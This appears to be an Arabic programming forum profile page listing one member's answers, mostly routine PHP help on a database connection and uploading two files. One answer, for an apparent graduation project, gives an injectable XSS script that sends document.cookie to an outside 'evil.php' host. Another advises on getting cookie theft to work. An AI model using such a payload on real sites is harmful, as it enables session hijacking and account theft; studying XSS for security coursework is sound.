اذهب إلى المحتوى

Shadi Habbal

الأعضاء
 عرض الملف الشخصي  تصفح المحتوى

  • المساهمات

    26

  • تاريخ الانضمام

  • تاريخ آخر زيارة

  • عدد الأيام التي تصدر بها

    2

 نوع المحتوى 

ريادة الأعمال

البرمجة

التصميم

DevOps

التسويق والمبيعات

العمل الحر

البرامج والتطبيقات

آخر التحديثات

قصص نجاح

أسئلة وأجوبة

كتب

دورات

أجوبة بواسطة Shadi Habbal

  2. مساعدة في معرفة الخطأ في الكود

    في أسئلة البرمجة

    نشر · تم التعديل في بواسطة Shadi Habbal

    السلام عليكم،

    تأكد من أنك بداية لا تستخدم أي إضافة أو مكافح فيروسات قد يمنع تنفيذ شفرات XSS كنوع من الحماية (مثل NoScript وسواها).

    الرابط الخاص بموقعك لا يعمل، يبدو أن الاستضافة قامت بحظره أو إزالته.

    قم أيضًا بوضع قيمة للـ cookie في المستند قبل محاولة سرقتها.. الصفحة بشكل افتراضي لا تملك أي cookie فمن الطبيعي ألا تحصل على أي قيمة :)

    لا تنس الاطلاع أيضًا على جوابي في سؤالك السابق حول الاستغلال بدون استخدام document.location

     

    • أعجبني 1

  3. مشكلة mysqli_query() expects parameter؟

    في أسئلة البرمجة

    نشر

    السلام عليكم

    أعتقد أن سبب المشكلة لديك يكمن في هذا السطر 

    $dbse = mysqli_connect("localhost", "root", "root", "dbname") or die (mysql_error());

    تأكّد من أن تنفيذه يعطيك object في $dbse وأن الاتصال يتم فعلًا.

    قم بإضافة السطر التالي بعده مباشرة وتأكد من أنه obj وليس string. 

    var_dump($dbse);
exit();

    والسلام عليكم ورحمة الله وبركاته

  4. مشكلة في رفع ملفين في نفس الوقت [PHP]؟

    في تطوير الواجهات الأمامية

    نشر

    استخدم التالي لإنشاء حقلين لإدخال الملفات في جهة العميل 

    <form id="upload" method="post" action="" enctype="multipart/form-data">
        <div id="drop">
            Drop Here
            <a>صورة</a>
            <input type="file" name="up[]" id="file1" multiple />
            <input type="file" name="up[]" id="file2" multiple />
        </div>

        <ul>
            <!-- The file uploads will be shown here -->
        </ul>
</form>

    كما تلاحظ، لقد قمت باستخدام مصفوفة بنفس الاسم في الـ name attribute للحقلين.

    الآن من جهة PHP سيكون بإمكانك الوصول لمواصفات الملف الأول عبر: 

    $_FILES['up']['name'][], $_FILES['up']['tmp_name'][], $_FILES['up']['size'][], $_FILES['up']['type'][]

    وللملف الثاني  

    $_FILES['up']['name'][1], $_FILES['up']['tmp_name'][1], $_FILES['up']['size'][1], $_FILES['up']['type'][1]

    تذكّر بأننا نتعامل مع مصفوفة، فالـ index=0 يمثّل الملف file1 والـ index=1 يمثّل الملف file2 دومًا لأن هذا هو الترتيب الذي حدّدناه في جهة HTML.

    السلام عليكم ورحمة الله وبركاته.

    • أعجبني 1

  5. أبحث عن طرق استغلال لثغرة أمان بغرض مشروع تخرج؟

    في جافا سكريبت

    نشر

    السلام عليكم

    يمكنك حقن التالي في الحالتين وسيتم التنفيذ عند عرض الصفحة.

    ملاحظة: الـ alert() موجود فقط للإشارة إلى نجاح تنفيذ الثغرة. 

    <script>img=new Image();img.onerror = function() {alert('XSS executed')};img.src="http://xyz.com/evil.php?cookie="+document.cookie;</script>

    خذ بعين الاعتبار أنك لم تعرض لنا رابط مشروعك لنختبر الحقن عليه قبل الإجابة، علمًا أن شرحك للمشكلة متشابك وغير واضح تمامًا.

    والسلام عليكم ورحمة الله وبركاته

    • أعجبني 1
×
×
  • أضف...